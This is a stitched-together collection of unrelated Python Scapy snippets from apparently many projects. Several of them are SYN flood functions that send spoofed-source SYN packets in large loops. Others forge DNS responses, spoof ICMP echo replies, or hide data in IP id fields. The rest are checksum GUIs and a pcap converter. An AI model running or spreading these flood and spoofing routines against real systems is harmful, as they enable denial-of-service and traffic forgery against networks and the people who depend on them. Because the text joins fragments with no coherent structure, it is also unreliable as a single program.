def SYN_Flood(targetIP, targetPort, counter): total = 0 # total number of packets sent to the target print "Packets are being sent to the target ..." for x in range(0, counter): s_port = randInt() s_eq = randInt() w_indow = randInt() # randomly generate all of these values (s_port, s_eq, w_indow using randInt() function IP_Packet = IP() IP_Packet.src = randomIP() # randomly generate IP address to be sending packets from IP_Packet.dst = targetIP TCP_Packet = TCP() TCP_Packet.sport = s_port TCP_Packet.dport = targetPort TCP_Packet.flags = "S" TCP_Packet.seq = s_eq TCP_Packet.window = w_indow send(IP_Packet / TCP_Packet, verbose=0) total += 1 sys.stdout.write("\nTotal packets sent to target : %i\n" % total)
def SYN_Flood(t_ip, t_port): print("Пакеты отправляются") global stop_thread stop_thread = True while stop_thread: global packets ip_p = IP() ip_p.src = randomIP() # записываем в поле ip источника случайный ip #ip_p.src = "8.8.8.8" ip_p.dst = t_ip # записываем ip сервера tcp_p = TCP() #tcp_p.sport = 234 tcp_p.sport = randint( 0, 6000) # записываем в поле port источника случайный port tcp_p.dport = t_port # записываем port сервер tcp_p.flags = "S" # устанавливаем флаг SYN tcp_p.seq = randint(0, 9000) # устанавливаем случайный порядковый номер ? tcp_p.window = randint(5000, 8191) # устанавливаем случайное окно ? send(ip_p / tcp_p, verbose=False) # отправляем пакет packets += 1 myapp.ui.packetsCount.setText(str(packets)) # print("Пакет {0} отправлен".format(i + 1)) packets = 0 myapp.ui.packetsCount.setText(str(packets))
def SYN_UDP_Flood(self, dstIP, dstPort, counter): try: total = 0 print("Packets are sending ...") for x in range(0, int(counter)): s_port = random.randint(1000, 9000) s_eq = random.randint(1000, 9000) w_indow = random.randint(1000, 9000) IP_Packet = IP() IP_Packet.src = ".".join( map(str, (random.randint(0, 255) for _ in range(4)))) IP_Packet.dst = dstIP # Created our own TCP packet UDP_Packet = UDP() UDP_Packet.sport = s_port UDP_Packet.dport = int(dstPort) UDP_Packet.flags = "S" UDP_Packet.seq = s_eq UDP_Packet.window = w_indow send(IP_Packet / UDP_Packet, verbose=0) total += 1 print("\nTotal packets sent: %i\n" % total) print() return 1 except: return 0
def test_packet_process(packet): """ tests packet processing """ pkt = IP(packet.get_payload() ) #converts the raw packet to a scapy compatible string qname = "hello.io" ip = IP() udp = UDP() ip.src = pkt[IP].dst ip.dst = pkt[IP].src udp.sport = pkt[UDP].dport udp.dport = pkt[UDP].sport # here we get the new public ip address solved_ip = "31.33.7.31" # I'm lazy, reader you might create a function to generate random IP :)) qd = pkt[UDP].payload dns = DNS(id=qd.id, qr=1, qdcount=1, ancount=1, arcount=1, nscount=1, rcode=0) dns.qd = qd[DNSQR] dns.an = DNSRR(rrname=qname, ttl=257540, rdlen=4, rdata=solved_ip) dns.ns = DNSRR(rrname=qname, ttl=257540, rdlen=4, rdata=solved_ip) dns.ar = DNSRR(rrname=qname, ttl=257540, rdlen=4, rdata=solved_ip) # write rule to NAT print "Sending the fake DNS reply to %s:%s" % (ip.dst, udp.dport) send(ip / udp / dns)
def cons_IP(): print("in ", cons_IP.__name__, " #######") t_ip = IP(ttl=10) t_ip.src = "127.0.0.1" t_ip.dst = "192.168.1.1" ls(t_ip) print() print()
def getTCPPacket(self): """ 构造TCP数据包 :return: """ try: ip_packet = IP() ip_packet.version = int(self.entries[8].get()) ip_packet.ihl = int(self.entries[9].get()) ip_packet.tos = int(self.entries[10].get()) ip_packet.id = int(self.entries[11].get()) # ip_packet.flags = int(self.entries[12].get()) ip_packet.frag = int(self.entries[13].get()) ip_packet.ttl = int(self.entries[14].get()) # ip_packet.chksum = self.entries[15].get() ip_packet.src = self.entries[16].get() ip_packet.dst = self.entries[17].get() tcp_packet = TCP() tcp_packet.sport = int(self.entries[0].get()) tcp_packet.dport = int(self.entries[1].get()) tcp_packet.seq = int(self.entries[2].get()) tcp_packet.ack = int(self.entries[3].get()) tcp_packet.dataofs = int(self.entries[4].get()) tcp_packet.flags = int(self.entries[5].get()) tcp_packet.window = int(self.entries[6].get()) # tcp_packet.chksum = self.entries[7].get() # scapy自动计算IP、TCP校验和 # 获得数据包的二进制值 pkg_raw = raw(ip_packet / tcp_packet) tcp_packet_raw = pkg_raw[20:] # 构造数据包,自动计算校验和 scapy_chksum_IP = IP(pkg_raw).chksum scapy_chksum_tcp = TCP(tcp_packet_raw).chksum print("scapy自动计算的TCP校验和为:%04x" % scapy_chksum_tcp) # 手动计算TCP校验和 tcp_packet.chksum = 0 packet = ip_packet / tcp_packet tcp_raw = raw(packet)[20:] self_chksum = in4_chksum(socket.IPPROTO_TCP, packet[IP], tcp_raw) print("手动计算的TCP校验和为:%04x" % self_chksum) if self_chksum == scapy_chksum_tcp: print("TCP验证和正确") else: print("TCP验证和不正确") tcp_packet.chksum = scapy_chksum_tcp self.entries[7].delete(0, END) self.entries[7].insert(0, hex(scapy_chksum_tcp)) self.entries[15].delete(0, END) self.entries[15].insert(0, hex(scapy_chksum_IP)) tcp_packet.show() self.resultText.insert('end', tcp_packet.summary() + '\n') self.resultText.insert('end', str(tcp_packet) + '\n') return Ether() / ip_packet / tcp_packet except Exception as e: print(e.with_traceback()) finally: pass
def getUDPPacket(self): """ 构造UDP数据包 :param self: :return: """ try: ip_packet = IP() ip_packet.version = int(self.entries[3].get()) ip_packet.ihl = int(self.entries[4].get()) ip_packet.tos = int(self.entries[5].get()) ip_packet.id = int(self.entries[6].get()) # ip_packet.flags = int(self.entries[7].get()) ip_packet.frag = int(self.entries[8].get()) ip_packet.ttl = int(self.entries[9].get()) # ip_packet.chksum = self.entries[10].get() ip_packet.src = self.entries[11].get() ip_packet.dst = self.entries[12].get() udp_packet = UDP() udp_packet.sport = int(self.entries[0].get()) udp_packet.dport = int(self.entries[1].get()) # udp_packet.chksum = int(self.entries[2].get()) # scapy自动计算IP、UDP校验和 # 获得数据包的二进制值 pkg_raw = raw(ip_packet / udp_packet) udp_packet_raw = pkg_raw[20:] # 构造数据包,自动计算校验和 scapy_chksum_IP = IP(pkg_raw).chksum scapy_chksum_udp = UDP(udp_packet_raw).chksum print("scapy自动计算的UDP校验和为:%04x" % scapy_chksum_udp) # 手动计算UDP校验和 udp_packet.chksum = 0 packet = ip_packet / udp_packet udp_raw = raw(packet)[20:] self_chksum = in4_chksum(socket.IPPROTO_UDP, packet[IP], udp_raw) print("手动计算的UDP校验和为:%04x" % self_chksum) if self_chksum == scapy_chksum_udp: print("UDP验证和正确") else: print("UDP验证和不正确") udp_packet.chksum = scapy_chksum_udp self.entries[2].delete(0, END) self.entries[2].insert(0, hex(scapy_chksum_udp)) self.entries[10].delete(0, END) self.entries[10].insert(0, hex(scapy_chksum_IP)) udp_packet.show() self.resultText.insert('end', udp_packet.summary() + '\n') self.resultText.insert('end', str(udp_packet) + '\n') return Ether() / ip_packet / udp_packet except Exception as e: print(e.with_traceback()) finally: pass
def print_pkt(pkt): pkt.show() a = IP() a.src = pkt[IP].dst a.dst = pkt[IP].src b = pkt[Raw].load b.type = 'echo-reply' b.code = 0 b.id = pkt[ICMP].id b.seq = pkt[ICMP].seq p = a / b send(p) p.show()
def icmp_reply(pkt): """ Reply to the packet which the sniffer capture. """ if pkt[ARP].op == 1: ip = IP() ip.dst = pkt[ARP].psrc ip.src = pkt[ARP].pdst icmp = ICMP() icmp.type = 0 send(ip / icmp)
def SYN_Flood( dstip, dstport, packets ): # Takes and input for destination IP and ports with how many packets you want to send print('Flooding !!!') dstport = [int(i) for i in dstport] for x in range(0, packets): IP_pack = IP() TCP_pack = TCP() IP_pack.src = RandIP() IP_pack.dst = dstip TCP_pack.sport, TCP_pack.dport = random.randint(0, 65535), dstport TCP_pack.flags, TCP_pack.seq, TCP_pack.window = "S", random.randint( 1, 1000), random.randint(1, 1000) send(IP_pack / TCP_pack, verbose=0)
def start_interception_test(): pckts = [] pl = b'deadbeef' for i in range(20): pkt = IP() pkt.src = i * 100 pkt.dst = i * 200 # pkt.payload = pl pckts.append(pkt) for i in range(len(pckts)): time.sleep(.5) q.put(pckts[i]) q.put(-1)
def foo(in_filename, out_filename): # open the input file for reading f = PcapReader(in_filename) # open the output file for writing o = PcapWriter(out_filename) # read the first packet from the input file p = f.read_packet() # while we haven't processed the last packet while p: layer = p.firstlayer() while not isinstance(layer, NoPayload): if (type(layer) is IPv6): new_layer = IP() del new_layer.ihl new_layer.ttl = layer.hlim new_layer.proto = layer.nh new_layer.src = ".".join(map(str, six2four(layer.src))) new_layer.dst = ".".join(map(str, six2four(layer.dst))) new_layer.add_payload(layer.payload) prev_layer = layer.underlayer del layer prev_layer.remove_payload() prev_layer.add_payload(new_layer) if type(prev_layer) is Ether: prev_layer.type = ETH_P_IP layer = new_layer if layer.default_fields.has_key('chksum'): del layer.chksum if layer.default_fields.has_key('len'): del layer.len # advance to the next layer layer = layer.payload # write the packet we just dissected into the output file o.write(p) # read the next packet p = f.read_packet() # close the input file f.close() # close the output file o.close()
def reply(pkt): """ Reply to the packet which the sniffer capture. """ if pkt[ICMP].type == 8: ip = IP() ip.dst = pkt[IP].src ip.src = pkt[IP].dst icmp = ICMP() icmp.id = pkt[ICMP].id icmp.seq = pkt[ICMP].seq icmp.type = 0 raw = Raw() raw.load = pkt[Raw].load send(ip / icmp / raw)
def sendSYN(target, port): # creating packet # insert IP header fields tcp = TCP() ip = IP() #set source IP ip.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint( 1, 254), random.randint(1, 254), random.randint(1, 254)) ip.dst = target # insert TCP header fields tcp = TCP() #set source port as random valid port tcp.sport = random.randint(1, 65535) tcp.dport = port #set SYN flag tcp.flags = 'S' send(ip / tcp) return
def syn_flood(ip_dst, dport, amnt): packet_deserved = 0 print("\nНачало отправки...") for packet in range(0, amnt): s_port, s_eq, w_indow = get_random_int(), get_random_int(), get_random_int() IP_Packet = IP() IP_Packet.src, IP_Packet.dst = get_random_IP(), ip_dst TCP_Packet = TCP() TCP_Packet.sport, TCP_Packet.dport = s_port, dport TCP_Packet.flags = "S" TCP_Packet.seq, TCP_Packet.window = s_eq, w_indow send(IP_Packet / TCP_Packet, verbose=0) packet_deserved += 1 print('\nВсего пакетов отправлено', packet_deserved)
def print_pkt(pkt): if (pkt[ICMP].type == 8): eth = Ether() eth.dst = pkt[Ether].src eth.src = pkt[Ether].dst ip = IP() ip.dst = pkt[IP].src ip.src = pkt[IP].dst ip.ihl = pkt[IP].ihl icmp = ICMP() icmp.id = pkt[ICMP].id icmp.seq = pkt[ICMP].seq icmp.type = 0 raw = Raw() raw.load = pkt[Raw].load send(eth / ip / icmp / raw)
def SYN_Flood(dstIP, dstPort, counter): total = 0 avg_time = 0 print("Packets are sending ...") attack_begin = time.process_time() for x in range(0, counter): s_port = randInt() s_eq = randInt() w_indow = randInt() IP_Packet = IP() IP_Packet.src = randomIP() IP_Packet.dst = dstIP TCP_Packet = TCP() TCP_Packet.sport = s_port TCP_Packet.dport = dstPort TCP_Packet.flags = "S" TCP_Packet.seq = s_eq TCP_Packet.window = w_indow start = time.process_time() send(IP_Packet / TCP_Packet, verbose=0) time_per_packet = (time.process_time() - start) # Write it in a file with open('syns_results_p.txt', 'a') as f: f.write(f'{x}, {time_per_packet}\n') avg_time = avg_time+ time_per_packet total += 1 attack_time = time.process_time() - attack_begin avg_time = avg_time/total with open('syns_results_p.txt', 'a') as f: f.write(f'\nTotal time - {attack_time}') f.write(f'\nAverage time - {avg_time}') now = datetime.now() current_time = now.strftime("%H:%M:%S") f.write(f'\nFinishing time: {current_time}') print(f"\nTotal packets sent: {total}\n")
def SYN_Flood(dstIP, dstPort): total = 0 print("Packets are sending ...") for x in range(0, 1000000): s_port = randInt() s_eq = randInt() w_indow = randInt() IP_Packet = IP() IP_Packet.src = randomIP() IP_Packet.dst = dstIP TCP_Packet = TCP() TCP_Packet.sport = s_port TCP_Packet.dport = dstPort TCP_Packet.flags = "S" TCP_Packet.seq = s_eq TCP_Packet.window = w_indow send(IP_Packet / TCP_Packet, verbose=0) print('one was sent') total += 1 sys.stdout.write("\nTotal packets sent: %i\n" % total)
def run(self): # There are two different ways you can go about pulling this off. # You can either: # - 1. Just open a socket to your target on any old port # - 2. Or you can be a cool kid and use scapy to make it look cool, and overcomplicated! # # (Uncomment whichever method you'd like to use) # Method 1 - s = socket.socket() s.connect((target, port)) # Methods 2 - i = IP() i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint( 1, 254), random.randint(1, 254), random.randint(1, 254)) i.dst = target t = TCP() t.sport = random.randint(1, 65535) t.dport = port t.flags = 'S' send(i / t, verbose=0)
def getICMPPacket(self): """ 构造ICMP报文 :return: """ try: icmp_packet = IP() / ICMP() icmp_packet.version = int(self.entries[2].get()) icmp_packet.id = int(self.entries[3].get()) icmp_packet.flags = int(self.entries[4].get()) icmp_packet.frag = int(self.entries[5].get()) icmp_packet.ttl = int(self.entries[6].get()) # ip_packet.chksum = str(self.entries[7].get()) icmp_packet.src = str(self.entries[8].get()) icmp_packet.dst = str(self.entries[9].get()) icmp_packet.type = int(self.entries[0].get()) # icmp_packet.chksum = str(self.entries[1].get()) # 获得数据包的二进制值 pkg_raw = raw(icmp_packet) # 构造数据包,自动计算校验和 icmp_packet = IP(pkg_raw) # 去除数据包的IP首部,并构建ICMP对象,这样可以获得ICMP的校验和 pkg_icmp = pkg_raw[20:] pkg_icmp = ICMP(pkg_icmp) print("scapy自动计算的ICMP的校验和为:%04x" % pkg_icmp.chksum) self.entries[1].delete(0, END) self.entries[1].insert(0, hex(pkg_icmp.chksum)) self.entries[7].delete(0, END) self.entries[7].insert(0, hex(icmp_packet.chksum)) icmp_packet.show() self.resultText.insert('end', icmp_packet.summary() + '\n') self.resultText.insert('end', str(icmp_packet) + '\n') return Ether() / icmp_packet except Exception as e: print(e.with_traceback()) finally: pass
def getIPPacket(self): """ 构造IP数据包 :return: """ # chksum = self.entries[9].get() try: eth = Ether() eth.src = self.entries[0].get() eth.dst = self.entries[1].get() eth.type = int(self.entries[2].get()) ip_packet = IP() ip_packet.versionion = int(self.entries[3].get()) ip_packet.ihl = int(self.entries[4].get()) ip_packet.tos = int(self.entries[5].get()) ip_packet.len = int(self.entries[6].get()) ip_packet.id = int(self.entries[7].get()) ip_packet.flags = int(self.entries[8].get()) ip_packet.frag = int(self.entries[9].get()) ip_packet.ttl = int(self.entries[10].get()) ip_packet.proto = int(self.entries[11].get()) payload = self.entries[16].get() ip_packet.src = self.entries[13].get() ip_packet.dst = self.entries[14].get() # 不含payload计算首部校验和 if payload == '': print("无payload的IP报文") ip_packet.show() checksum_scapy = IP(raw(ip_packet)).chksum # 自主计算验证IP首部检验和并进行填充 print("scapy自动计算的IP首部检验和是:%04x (%s)" % (checksum_scapy, str(checksum_scapy))) # 1.将IP首部和自动设置为0 ip_packet.chksum = 0 # 2.生成ip首部的数据字符串 x = raw(ip_packet) ipString = "".join("%02x" % orb(x) for x in x) # 3.将ip首部的数据字符串转换成字节数组 ipbytes = bytearray.fromhex(ipString) # 4.调用校验和计算函数计算校验和 checksum_self = self.IP_headchecksum(ipbytes) # 5.进行校验和验证 print("验证计算IP首部的检验和是:%04x (%s)" % (checksum_self, str(checksum_self))) # 含payload计算首部校验和 else: print("含有payload的IP报文") ip_packet = ip_packet / payload ip_packet.show() ip_packet.len = 20 + len(payload) checksum_scapy = IP(raw(ip_packet)).chksum print("scapy自动计算的IP首部检验和是:%04x (%s)" % (checksum_scapy, str(checksum_scapy))) ip_packet.chksum = 0 ip_packet.ihl = 5 print('\n 报文长度是:%s' % str(ip_packet.len)) x = raw(ip_packet) ipString = "".join("%02x" % orb(x) for x in x) ipbytes = bytearray.fromhex(ipString) checksum_self = self.IP_headchecksum(ipbytes[0:ip_packet.ihl * 4]) print("验证计算IP首部的检验和是:%04x (%s)" % (checksum_self, str(checksum_self))) if checksum_self == checksum_scapy: print("检验和正确") else: print("检验和不正确") ip_packet.chksum = checksum_self self.entries[12].delete(0, END) self.entries[12].insert(0, hex(ip_packet.chksum)) ip_packet.show() self.resultText.insert('end', ip_packet.summary() + '\n') self.resultText.insert('end', str(ip_packet) + '\n') return eth / ip_packet except Exception as e: print(e.with_traceback()) finally: pass
from scapy.all import * from scapy.layers.inet import IP, TCP from scapy.layers.l2 import * ip1 = IP() ip1.src = "223.129.0.189" ip1.dst = "223.129.0.190" tcp1 = TCP() tcp1.sport = 80 tcp1.dport = 81 packet1 = Ether() / ip1 / tcp1 packet1.show() hexdump(packet1) name1 = "tcp-opposite-five-tuple-1" wrpcap("src/scapy/" + name1 + ".pcap", packet1) ip2 = IP() ip2.src = "223.129.0.190" ip2.dst = "223.129.0.189" tcp2 = TCP() tcp2.sport = 81 tcp2.dport = 80 packet2 = Ether() / ip2 / tcp2 packet2.show() hexdump(packet2) name2 = "tcp-opposite-five-tuple-2" wrpcap("src/scapy/" + name2 + ".pcap", packet2)
import time import random from ipaddress import IPv4Address def random_ip_address(): bits = random.getrandbits(32) # generates an integer with 32 random bits addr = IPv4Address(bits) # instances an IPv4Address object from those bits return str(addr) # get the IPv4Address object's string representation # ---------------MAIN-SCRIPT-----------------# #results = open("syn_results_p.txt","a") sum = 0 src_IP = random_ip_address() src_PORT = 1234 dst_PORT = 80 ip = IP(src=[src_IP], dst=['10.0.2.8']) SYN = TCP(sport=src_PORT, dport=dst_PORT, flags='S', seq=1000) for i in range(0, 10 * 10000): ip.src = random_ip_address() start = time.time() send(ip / SYN, verbose=0) end = time.time() delta = end - start sum = sum + delta print(str(i) + ":" + str(delta)) #results.write(str(i)+":"+str(delta)+"\n") #results.write("AVG : "+str(delta)+"\n") print("AVG : " + str(delta) + "\n") results.close()
#!/usr/bin/env python3 from scapy.all import * from scapy.layers.inet import IP, ICMP """ Send ICMP packet from 10.9.0.4 to 10.9.0.1. """ a = IP(dst="10.9.0.1") a.src = '10.9.0.4' b = ICMP() send(a / b)
#! /usr/bin/env python3 from scapy.all import * from scapy.layers.inet import IP,TCP out_ip = IP() # end of message flag eom = ord("!") * 256 # first ask source and destination addrs #out_ip.src = input("Source: ") #out_ip.dst = input("Destination: ") #loopback out_ip.src = "127.0.0.1" out_ip.dst ="127.0.0.1" ##### ENCODING # ask usr for message to encode msg = input("Message to send: ") # loop to encode message - multiply each char by 256 for letter in msg: encoded_letter = ord(letter) * 256 out_ip.id = encoded_letter # send packet! send(out_ip) # finally send eom out_ip.id = eom send(out_ip)